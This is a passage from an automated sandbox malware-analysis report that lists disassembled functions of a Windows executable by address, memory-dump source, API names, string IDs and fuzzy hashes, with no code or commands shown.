                                                                          • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                          • Instruction Fuzzy Hash: 63B2F972E0E6918EEB209F6495082BDB7A1FB44758FD24135DE4D57BA4EF3CE8428720
                                                                          Function 00007FF7ADC94074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 4170576061-0
                                                                          • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                          • Instruction ID: 900fa3d37881e0bb7f10e24c68d834007f3f02e984cc14fc630b14d13eeda7a8
                                                                          • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                          • Instruction Fuzzy Hash: 33510521B1E66289DB04FB56E404669FB90FB89FE0FC64131EE5D077A6EE3CD4028790
                                                                          Function 00007FF7ADC86D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                          • String ID: .lnk
                                                                          • API String ID: 948891078-24824748
                                                                          • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                          • Instruction ID: 75df2f781f42e292df498aed34fb6de577806487b618c765def9b9ad11d8ed5c
                                                                          • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                          • Instruction Fuzzy Hash: 53D18032B1DB5689EB10EB25D4906ADAB60FB80B88FC25031EE4E47B75EE3CD546C750
                                                                          Function 00007FF7ADC3793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _handle_error
                                                                          • String ID: !$VUUU$fmod
                                                                          • API String ID: 1757819995-2579133210
                                                                          • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                          • Instruction ID: 5c67afd6ac098c713ab43e46d739ebe04e23c059bdedb970d86c0029d7754c21
                                                                          • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                          • Instruction Fuzzy Hash: E5B11621A1DFC448D6A79A3454113B6F259EFAA390F91D332E94E36BB0EF2C95838700
                                                                          Function 00007FF7ADC42D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC42D60
                                                                            • Part of subcall function 00007FF7ADC3B184: GetCurrentProcess.KERNEL32(00007FF7ADC3B21D), ref: 00007FF7ADC3B1B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                          • String ID: *$.$.
                                                                          • API String ID: 2518042432-2112782162
                                                                          • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                          • Instruction ID: 33c084e1729b5fec01887537bb7b9cc77cb78105adc615dfe119d83b0e41a49e
                                                                          • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                          • Instruction Fuzzy Hash: 4851E2A6F1AA5588FB10EBA598092BDE2A1FF44BC8FD64035DE0D17B95FE38D0438310
                                                                          Function 00007FF7ADC384C0 Relevance: 7.1, APIs: 4, Instructions: 1071COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 1286766494-0
                                                                          • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                          • Instruction ID: 7048b36b01778098a112fe2745d3d08add2bcf06c24c384972d9a526bfabc337
                                                                          • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                          • Instruction Fuzzy Hash: A9A2BF36A0E6428EEB289F28D4501B9F7A1FF44B88FD54135D74D07AA8EF7DD6128720
                                                                          Function 00007FF7ADC25BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7ADC25C43
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 389471666-631824599
                                                                          • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                          • Instruction ID: e7236d3892c19c81df1f54e6fcd33096228f66cb4899fffd6be4b4ac7eb64c0e
                                                                          • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                          • Instruction Fuzzy Hash: E3118F32A2AB429BEB14AB22D6503B973A0FF44345FC14134C64D42A60FF3CE4A5CB20
                                                                          Function 00007FF7ADC06D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                          • Instruction ID: 37d6068e9b1f0e64895c4579ebb6cd7fde2f428170244bfdb11258dc95071e39
                                                                          • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                          • Instruction Fuzzy Hash: B2E0C92591BF0686EB15AF11E81436463A5FB08B48FC50835C91D45360FF7CE596C260
                                                                          Function 00007FF7ADC12E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID: Variable must be of type 'Object'.
                                                                          • API String ID: 1385522511-109567571
                                                                          • Opcode ID: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                          • Instruction ID: dd7c53a521ef196edc3c8ff52e299e2a09c010f18cde2f4ae4f81ac9f18a9894
                                                                          • Opcode Fuzzy Hash: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                          • Instruction Fuzzy Hash: DEC2A236A0E6928AEB60EF15D4502B9B765FB44B88FD64131EA4E477B5EF3CE442C310
                                                                          Function 00007FF7ADC96320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2733932498-0
                                                                          • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                          • Instruction ID: 79784081382ff00097f55b8b526b09c57afeb6494f044e1bf52a427a629e8a22
                                                                          • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                          • Instruction Fuzzy Hash: 9AB1A127B0AB5689EB10EF66D4806ADA761FB48FD4FC65031EE1D477A6EE38D442C310
                                                                          Function 00007FF7ADC9EB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 2000298826-0
                                                                          • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                          • Instruction ID: a9dce2187e6abdb14dcfee91e87dcce567c818b600a6922f7103874e2892f93d
                                                                          • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                          • Instruction Fuzzy Hash: 26718136B19B418AE700EB21E4443AEB7A5FB88B88FC14131EA4D07769EF7CD506C750
                                                                          Function 00007FF7ADC202C4 Relevance: 5.7, Strings: 2, Instructions: 3180COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DEFINE$x
                                                                          • API String ID: 0-4035502692
                                                                          • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                          • Instruction ID: bf151b03e3793d6b24b6b5e030eb84b765e76f08b665f553a2763fdca807f1c4
                                                                          • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                          • Instruction Fuzzy Hash: 7753B032A1D6518EE760EFA5C4406BC77A1FB04B88FD29136DE0957BA4FB38E942C711
                                                                          Function 00007FF7ADC13C20 Relevance: 5.3, APIs: 3, Instructions: 832COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID:
                                                                          • API String ID: 1385522511-0
                                                                          • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                          • Instruction ID: c94cbf33577d3a049a89a935a8b3cbdfe491e99f52e7650f1840682736083055
                                                                          • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                          • Instruction Fuzzy Hash: DC827132A0E6628AEA50EF55D4546B9B3A4FB44B84FD24035EA4D477B4FF3DE442D320
                                                                          Function 00007FF7ADC20E90 Relevance: 4.9, Strings: 3, Instructions: 1176COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $[$\
                                                                          • API String ID: 0-3681541464
                                                                          • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                          • Instruction ID: 30fc60df6ecc5790483208af9f38fa58324725f8ea390a792a3b8c13dd1a2d6f
                                                                          • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                          • Instruction Fuzzy Hash: 19B28D32B0A6528EEB24AFA5C4406BC77B1FB44748FD25136DA0D57BA4FB38E842C751
                                                                          Function 00007FF7ADC86428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                          • Instruction ID: 72757cf92eb0c41a8b8d40a7f421ec131a269ccf520bd75ffc522cf798b71282
                                                                          • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                          • Instruction Fuzzy Hash: BF516932609A4689DB14EF25D4902ADB760FB84B94FD24232DB6E437B5EF3CE552C720
                                                                          Function 00007FF7ADC6D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                          • String ID:
                                                                          • API String ID: 2278415577-0
                                                                          • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                          • Instruction ID: 8b2134f70d691b0f43b07b5f225c591ffff65f155b04a37ff245bfe26430e1a2
                                                                          • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                          • Instruction Fuzzy Hash: AB21AC72A0DA818ADB04EF66F44026AB7A0FB88BD4F858435DF4D07728EF78D556C710
                                                                          Function 00007FF7ADC6D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                          • Instruction ID: 25480ea6a5bd29db35b34feeda83a47e041cf9c2157f24b6b39de19843e8657f
                                                                          • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                          • Instruction Fuzzy Hash: E0015273A287818FE7108F20E4953AD73B0F75476EF810929E64D86A98DB7DC159CF80
                                                                          Function 00007FF7ADC6CDC4 Relevance: 4.5, APIs: 3, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocInitializeProcess
                                                                          • String ID:
                                                                          • API String ID: 570334035-0
                                                                          • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
